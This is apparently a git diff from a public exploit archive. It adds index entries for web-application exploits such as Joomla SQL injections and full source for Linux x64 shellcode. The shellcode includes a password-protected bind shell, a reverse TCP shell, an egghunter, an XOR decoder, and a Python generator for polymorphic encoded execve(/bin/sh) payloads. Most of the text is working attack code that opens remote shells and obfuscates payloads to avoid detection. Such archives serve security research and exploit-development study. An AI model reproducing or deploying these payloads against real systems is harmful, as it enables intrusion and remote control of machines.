+43948,exploits/php/webapps/43948.html,"Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43950,exploits/php/webapps/43950.txt,"Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43957,exploits/php/webapps/43957.txt,"Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43958,exploits/php/webapps/43958.txt,"Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload",2018-02-02,"Ihsan Sencan",webapps,php,
+43959,exploits/php/webapps/43959.txt,"Joomla! Component JMS Music 1.1.1 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
+43960,exploits/multiple/webapps/43960.py,"Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal",2018-02-02,"Dmitry Chastuhin",webapps,multiple,
+43961,exploits/hardware/webapps/43961.txt,"FiberHome AN5506 - Unauthenticated Remote DNS Change",2018-02-02,r0ots3c,webapps,hardware,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -837,6 +837,12 @@ id,file,description,date,author,type,platform
 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86
 43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
+43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2018-11-09,0x4ndr3,shellcode,linux_x86-64
+43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64
+43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64
+43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64
+43955,shellcodes/generator/43955.py,"Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator)",2017-12-19,0x4ndr3,shellcode,generator
+43956,shellcodes/linux_x86-64/43956.c,"Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode",2018-02-02,0x4ndr3,shellcode,linux_x86-64
 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
 41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
--- a/shellcodes/generator/43955.py
+++ b/shellcodes/generator/43955.py
@ -0,0 +1,124 @@
+#!/usr/bin/python
+from random import randint
+
+encoded = ""
+encoded2 = ""
+
+bad_chars = [0x00]
+
+shellcode = ("\x90" + "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x54\x5e\x57\x54\x5a\x0f\x05")
+
+def valid(byte):
+    for ch in bad_chars:
+        if ch == byte:
+            return False
+    return True
+
+valid_R = False
+while not valid_R:
+    R = randint(0,2**8-1)
+    print
+    print "random generated number (key): 0x%02x" %R
+    valid_R = True
+    for x in bytearray(shellcode):
+    	# XOR Encoding 	
+	y = x ^ R
+        if not valid(y):
+            valid_R = False
+            encoded = ""
+            encoded2 = ""
+            break
+	encoded += "\\x"
+	encoded += "%02x" %y
+	encoded2 += "0x"
+	encoded2 += "%02x," %y
+encoded2 = encoded2[0:-1] # the [0:-1] is just to remove the "," at the end 
+print "Encoded shellcode ..."
+print encoded
+print encoded2
+print
+print "Len: %d" % len(bytearray(shellcode))
+print
+
+tab = "   "
+poly_db = { "pop rdi":
+                [tab+"pop rdi\n",
+                 tab+"mov rdi,[rsp]\n"+tab+"add rsp,8\n"],
+            "push <param1>|pop <param2>":
+                [tab+"push <param1>\n"+tab+"pop <param2>\n",
+                 tab+"mov <param2>,<param1>\n"],
+            "mov byte dl,[rdi]":
+                [tab+"mov byte dl,[rdi]\n",
+                 tab+"mov r9,rdi\n"+tab+"mov byte dl,[r9]\n"],
+            "xor rdi,rdi":
+                [tab+"xor rdi,rdi\n",
+                 tab+"sub rdi,rdi\n"],
+            "inc rdi":
+                [tab+"inc rdi\n",
+                 tab+"dec rdi\n"+tab+"add rdi,2\n"],
+            "mov byte <param1>,byte <param2>":
+                [tab+"mov <param1>,<param2>\n",
+                 tab+"mov r9b,<param2>\n"+tab+"mov <param1>,r9b\n"],
+            "xor al,dil":
+                [tab+"xor al,dil\n",
+                 tab+"mov r9b,dil\n"+tab+"xor al,r9b\n"],
+            "cmp al,0x90":
+                [tab+"cmp al,0x90\n",
+                 tab+"mov ah,0xff\n"+tab+"cmp ax,0xff90\n"],
+            "push <number>|pop <param2>":
+                [tab+"push <param1>\n"+tab+"pop <param2>\n",
+                 tab+"xor <param2>,<param2>\n"+tab+"add <param2>,<param1>\n"],
+            "xor byte [rdi],al":
+                [tab+"xor byte [rdi],al\n",
+                 tab+"mov byte r9b,[rdi]\n"+tab+"xor r9b,al\n"+tab+"mov byte [rdi],r9b\n"],
+            "loop decode":
+                [tab+"loop decode\n",
+                 tab+"dec rcx\n"+tab+"xor r9,r9\n"+tab+"cmp r9,rcx\n"+tab+"jne decode\n"]
+        }
+def poly(instruction,param1="",param2="",param3=""):
+    options = poly_db[instruction]
+    r = randint(0,len(options)-1)
+    str = options[r]
+    str = str.replace("<param1>",param1)
+    str = str.replace("<param2>",param2)
+    str = str.replace("<param3>",param3)
+    return str
+
+code =  "global _start \n"
+code += "\n"
+code += "section .text\n"
+code += "\n"
+code += "_start:\n"
+code += "   jmp short find_address\n"
+code += "decoder:\n"
+code += "   ; Get the address of the string \n"
+code +=     poly("pop rdi")
+code +=     poly("push <param1>|pop <param2>","rdi","rbx")
+code += "\n"
+code += "   ; get the first byte and bruteforce till you get the token 0x90\n"
+
+code +=     poly("mov byte dl,[rdi]")
+code +=     poly("xor rdi,rdi") # key that will be incremented from 0x00 to 0xff
+code += "bruteforce:\n"
+code +=     poly("inc rdi")
+code +=     poly("mov byte <param1>,byte <param2>","al","dl")
+code +=     poly("xor al,dil")
+code +=     poly("cmp al,0x90")
+code += "   jne bruteforce\n"
+code += "\n"
+code +=     poly("push <number>|pop <param2>",str(len(bytearray(shellcode))),"rcx")
+code +=     poly("mov byte <param1>,byte <param2>","al","dil")
+code +=     poly("push <param1>|pop <param2>","rbx","rdi")
+code += "decode:\n"
+code +=     poly("xor byte [rdi],al")
+code +=     poly("inc rdi")
+code +=     poly("loop decode")
+code += "\n"
+code += "   jmp rbx\n" # jmp to decoded shellcode
+code += "   \n"
+code += "find_address:\n"
+code += "   call decoder\n"
+code += "   encoded db " + encoded2 + "\n"
+
+fout = open("decoder.nasm","w")
+fout.write(code)
--- a/shellcodes/linux_x86-64/43951.nasm
+++ b/shellcodes/linux_x86-64/43951.nasm
@ -0,0 +1,112 @@
+global _start
+
+_start:
+
+	; sock = socket(AF_INET, SOCK_STREAM, 0)
+	; AF_INET = 2
+	; SOCK_STREAM = 1
+	; syscall number 41 
+
+	push 41
+	pop rax
+	push 2
+	pop rdi
+	push 1
+	pop rsi
+	cdq
+	syscall
+	
+	; copy socket descriptor to rdi for future use 
+
+	xchg rdi,rax
+
+	; server.sin_family = AF_INET 
+	; server.sin_port = htons(PORT)
+	; server.sin_addr.s_addr = INADDR_ANY
+	; bzero(&server.sin_zero, 8)
+
+	push rdx
+	mov dx,0x5c11
+	shl rdx,16
+	xor dl,0x2
+	push rdx
+
+	; bind(sock, (struct sockaddr *)&server, sockaddr_len)
+	; syscall number 49
+
+	mov rsi, rsp
+	mov al,49
+	push 16
+	pop rdx
+	syscall
+
+	; listen(sock, MAX_CLIENTS)
+	; syscall number 50
+
+	push 50
+	pop rax
+	push 2
+	pop rsi
+	syscall
+
+	; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
+	; syscall number 43
+
+	mov al,43
+	sub rsp,16
+	mov rsi,rsp
+	push 16
+	mov rdx,rsp
+	syscall
+
+	; close parent
+	;push 3
+	;pop rax
+	;syscall
+
+	; duplicate sockets
+
+	; dup2 (new, old)
+	xchg rdi,rax
+	push 3
+	pop rsi
+dup2cycle:
+	mov al, 33
+	dec esi
+	syscall
+	loopnz dup2cycle
+
+	; read passcode
+	; xor rax,rax - already zeroed from prev cycle
+	xor rdi,rdi
+	push rax
+	mov rsi,rsp
+	push 8
+	pop rdx
+	syscall
+
+	; Authentication with password "1234567"
+	xchg rcx,rax
+	mov rbx,0x0a37363534333231
+	push rbx
+	mov rdi,rsp
+	repe cmpsb
+	jnz wrong_pwd
+
+	; execve stack-method
+
+	push 59
+	pop rax
+	cdq ; extends rax sign into rdx, zeroing it out
+	push rdx
+	mov rbx,0x68732f6e69622f2f
+	push rbx
+	mov rdi,rsp
+	push rdx
+	mov rdx,rsp
+	push rdi
+	mov rsi,rsp
+	syscall
+
+wrong_pwd:
+	nop
--- a/shellcodes/linux_x86-64/43952.nasm
+++ b/shellcodes/linux_x86-64/43952.nasm
@ -0,0 +1,89 @@
+global _start
+
+_start:
+
+        ; sock = socket(AF_INET, SOCK_STREAM, 0)
+        ; AF_INET = 2
+        ; SOCK_STREAM = 1
+        ; syscall number 41 
+
+        push 41
+        pop rax
+        push 2
+        pop rdi
+        push 1
+        pop rsi
+        cdq
+        syscall
+
+        ; copy socket descriptor to rdi for future use 
+        xchg rdi, rax
+
+        ; server.sin_family = AF_INET 
+        ; server.sin_port = htons(PORT)
+        ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
+        ; bzero(&server.sin_zero, 8)
+
+        push rdx ; already zeroed by "cdq" instruction
+        mov rbx, 0xfeffff80a3eefffd
+        not rbx
+        push rbx
+
+        ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
+       
+	push rsp
+	pop rsi 
+        mov al,42
+        mov dl,16
+        syscall
+
+        ; duplicate sockets
+
+        ; dup2 (new, old)
+
+        push 3
+        pop rsi
+dup2cycle:
+        mov al, 33
+        dec esi
+        syscall
+        loopnz dup2cycle       
+        
+        ; read passcode
+        ; xor rax,rax - already zeroed out by prev cycle
+        xor rdi,rdi
+        push rax
+	push rsp
+	pop rsi
+        mov dl,8
+        syscall
+
+        ; Authentication with password "1234567"
+        xchg rcx,rax
+        mov rbx,0x0a37363534333231
+        push rbx
+	push rsp
+	pop rdi
+        repe cmpsb
+        jnz wrong_pwd
+
+        ; execve stack-method
+
+        push 59
+        pop rax
+        cdq ; extends rax sign into rdx, zeroing it out
+        push rdx
+        mov rbx, 0x68732f6e69622f2f
+        push rbx
+	push rsp
+	pop rdi
+        push rdx
+	push rsp
+	pop rdx
+        push rdi
+	push rsp
+	pop rsi
+        syscall
+
+wrong_pwd:
+        nop
--- a/shellcodes/linux_x86-64/43953.nasm
+++ b/shellcodes/linux_x86-64/43953.nasm
@ -0,0 +1,23 @@
+global _start
+section .text
+_start:
+        xor rsi,rsi
+
+        push rsi ; starts the search at position 0
+        pop rdi
+
+next_page:
+        or di,0xfff
+        inc rdi
+
+next_4_bytes:
+        push 21
+        pop rax
+        syscall
+        cmp al,0xf2
+        jz next_page
+        mov eax,0xefbeefbd
+        inc al
+        scasd
+        jnz next_4_bytes
+        jmp rdi
--- a/shellcodes/linux_x86-64/43954.nasm
+++ b/shellcodes/linux_x86-64/43954.nasm
@ -0,0 +1,37 @@
+global _start 
+
+section .text
+
+_start:
+   jmp find_address ; jmp short by default
+decoder:
+   ; Get the address of the string 
+   pop rdi
+   push rdi
+   pop rbx
+
+   ; get the first byte and bruteforce till you get the token 0x90
+   mov byte dl, [rdi]
+   xor rdi,rdi ; key that will be incremented from 0x00 to 0xff
+bruteforce:
+   inc rdi
+   mov al,dl
+   xor al,dil
+   cmp al,0x90
+   jne bruteforce
+
+   push 27 ; shellcode length (given by encoder)
+   pop rcx
+   mov al,dil
+   push rbx
+   pop rdi
+decode:
+   xor byte [rdi], al
+   inc rdi
+   loop decode
+
+   jmp rbx ; jmp to decoded shellcode
+   
+find_address:
+   call decoder
+   encoded db 0x23,0xd9,0x88,0xeb,0x2a,0xe1,0xfb,0x08,0x9c,0x9c,0xd1,0xda,0xdd,0x9c,0xc0,0xdb,0xe0,0xe7,0xec,0xe1,0xe7,0xed,0xe4,0xe7,0xe9,0xbc,0xb6
--- a/shellcodes/linux_x86-64/43956.c
+++ b/shellcodes/linux_x86-64/43956.c